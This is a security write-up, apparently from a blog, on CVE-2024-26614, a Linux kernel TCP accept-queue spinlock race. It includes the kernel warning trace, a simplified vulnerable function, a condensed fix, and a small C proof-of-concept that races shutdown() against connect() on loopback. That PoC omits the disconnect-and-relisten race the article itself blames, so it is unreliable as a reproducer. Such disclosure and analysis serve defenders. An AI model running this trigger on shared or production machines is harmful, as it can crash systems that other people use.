CVE-2024-26614 - Linux Kernel TCP Accept Queue Spinlock Initialization Vulnerability – Analysis, Exploit, and Remediation
On the cutting edge of Linux kernel security, CVE-2024-26614 emerges as a subtle yet serious concurrency bug in the TCP implementation. It hinges on improper initialization of spinlocks for a connection's accept queue, potentially resulting in a corrupted lock value, nasty kernel warnings, or even undefined behavior. This vulnerability was triggered and analyzed using the syzkaller fuzzer and has now been resolved in upstream kernels.
This article takes you through the vulnerability and its exploitability, covers kernel trace details, and discusses code changes that ensure the bug cannot harm systems anymore.
Summary
- Component: Linux kernel, net/ipv4/inet_connection_sock.c
- Cause: Failure to guarantee a one-time initialization of the accept_queue's spinlocks in TCP sockets.
- Impact: Potentially corrupted internal lock states, leading to kernel warnings or crashes.
- CVE Identifier: CVE-2024-26614
- Upstream Fix: merged into the mainline Linux kernel (see The Upstream Patch below)
The Problem
Linux uses spinlocks to synchronize access to internal kernel structures. In TCP, a crucial structure is the accept_queue, used for queuing new incoming connections before userspace accepts them.
The vulnerable code failed to ensure that the accept_queue's spinlock was properly initialized only once, especially in certain rare, racy scenarios where connections were being established and closed concurrently.
The following kernel warning demonstrates the hazard:
pvqspinlock: lock 0xffff9d181cd5c660 has corrupted value 0x0!
WARNING: CPU: 19 PID: 21160 at __pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508)
...
The racing call paths are:
- inet_csk_reqsk_queue_add() (adding an established connection to the accept queue)
- concurrently: inet_shutdown() / tcp_disconnect() / tcp_set_state(sk, TCP_CLOSE)
During these races, if the accept queue's spinlock has been re-initialized or left uninitialized, unlocking it corrupts the lock value or triggers a kernel warning or panic.
The Race Condition (Simplified Timeline)
Thread A (receiving connections)     Thread B (tearing down connection)
tcp_v4_rcv()                         inet_shutdown()
tcp_check_req()                      tcp_disconnect()
inet_csk_complete_hashdance()        tcp_set_state(sk, TCP_CLOSE)
inet_csk_reqsk_queue_add()
If initialization is not robust, concurrent teardown can see an uninitialized lock.
Here is the problematic code section, simplified
// include/net/inet_connection_sock.h (simplified)
struct inet_connection_sock {
    /* ... */
    struct request_sock_queue icsk_accept_queue;
    /* ... */
};

// net/ipv4/inet_connection_sock.c (simplified)
struct sock *inet_csk_reqsk_queue_add(struct sock *sk,
                                      struct request_sock *req,
                                      struct sock *child)
{
    struct request_sock_queue *queue = &inet_csk(sk)->icsk_accept_queue;

    spin_lock(&queue->rskq_lock);
    /* ... queue the child socket for accept() ... */
    spin_unlock(&queue->rskq_lock);
    return child;
}
The bug: in rare races (the connection hashdance racing with disconnect and re-listen), this lock can be re-initialized while held, or used before it is properly initialized.
Root Cause
The kernel must ensure that every spinlock is initialized *exactly once*, before any use, and never re-initialized while it may be held. In the TCP socket's lifetime, the accept_queue's spinlocks were set up on the listen path rather than at socket creation, so a quick disconnect-and-relisten sequence racing with connection teardown opened windows in which the spinlock was used in an uninitialized or freshly re-initialized state.
Proof-of-Concept: Trigger Using Syzkaller
Syzkaller (an automated kernel fuzzer) found the issue. Below is a minimal PoC-style C program to simulate the race. (May need root and unpatched kernel to trigger.)
// Compile: gcc -pthread -o poc poc.c && ./poc
#define _GNU_SOURCE
#include <pthread.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdio.h>

void *shutdown_thread(void *arg) {
    int s = *(int *)arg;
    sleep(1); // Slight delay to overlap with connect()
    shutdown(s, SHUT_RDWR);
    close(s);
    return NULL;
}

int main() {
    struct sockaddr_in addr = {};
    addr.sin_family = AF_INET;
    addr.sin_port = htons(0); // let the kernel pick a free port
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);

    int listen_s = socket(AF_INET, SOCK_STREAM, 0);
    bind(listen_s, (struct sockaddr *)&addr, sizeof(addr));
    listen(listen_s, 1);

    socklen_t len = sizeof(addr);
    getsockname(listen_s, (struct sockaddr *)&addr, &len);

    int client_s = socket(AF_INET, SOCK_STREAM, 0);
    pthread_t thr;
    pthread_create(&thr, NULL, shutdown_thread, &client_s);
    connect(client_s, (struct sockaddr *)&addr, sizeof(addr));

    int conn_s = accept(listen_s, NULL, NULL);
    pthread_join(thr, NULL);
    close(conn_s);
    close(listen_s);
    return 0;
}
What happens? On a vulnerable kernel, running this code quickly and repeatedly may output kernel warnings about corrupted spinlocks (shown in dmesg).
Exploitability & Impact
While this bug primarily leads to *kernel warnings or crash* (DoS), and may not be directly exploitable for remote code execution, the significance is high:
- A local user can intentionally trigger this kernel race, potentially crashing the system or causing erratic TCP behavior. In containerized environments or on shared servers, this can be highly disruptive.
- It demonstrates a common class of bugs: *double initialization or lack-of-init for spinlocks under concurrency*.
The Upstream Patch
The fix was merged into the upstream Linux kernel (see commit 5cccc1e7b21b).
Key Patch Section (simplified)
// Simplified illustration of the fix (function and field names condensed;
// see the actual commit for the exact code)
void inet_csk_init(struct sock *sk)
{
    struct inet_connection_sock *icsk = inet_csk(sk);
    /* ... */
    // Initialize the accept-queue spinlocks exactly once, at socket
    // creation time, instead of on every listen()
    spin_lock_init(&icsk->icsk_accept_queue.rskq_lock);
    /* ... */
}
References
- CVE-2024-26614 (NVD details)
- Linux Kernel upstream fix (commit)
- Syzkaller Kernel Fuzzing Project
- Linux Kernel TCP code
Conclusion
CVE-2024-26614 is a good reminder that locking and initialization bugs are subtle, but serious, in the Linux kernel. While this vulnerability boils down to a mis-timed spinlock initialization in TCP accept queue handling, its effects are real—from kernel warning spam to potential crashes triggered by local users.
Patch, upgrade, and stay vigilant!
*This article is an exclusive, accessible breakdown based entirely on public Linux kernel sources, changelogs, and bug threads—useful for kernel developers, sysadmins, bug bounty hunters, and security enthusiasts alike.*
Timeline
Published on: 03/11/2024 18:15:19 UTC
Last modified on: 11/06/2024 15:35:13 UTC